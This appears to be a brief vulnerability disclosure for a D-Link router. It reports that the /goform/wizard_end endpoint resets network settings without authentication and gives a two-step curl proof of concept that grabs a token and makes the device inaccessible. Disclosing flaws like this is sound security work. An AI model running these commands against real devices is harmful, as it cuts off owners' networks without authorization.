-
Manufacturer's address:https://www.dlink.com/
-
Firmware download address : http://tsd.dlink.com.tw/GPL.asp
The picture above shows the latest firmware for this version
Vulnerability occurs in /goform/wizard_end, Initialize the network without authentication
The first thing you need to do is to get the tokenid
curl http://192.168.0.1/dir_login.asp | grep tokenid
Then run the following poc
curl -i -X POST http://192.168.0.1/goform/wizard_end -d tokenid=xxxx
now inaccessible
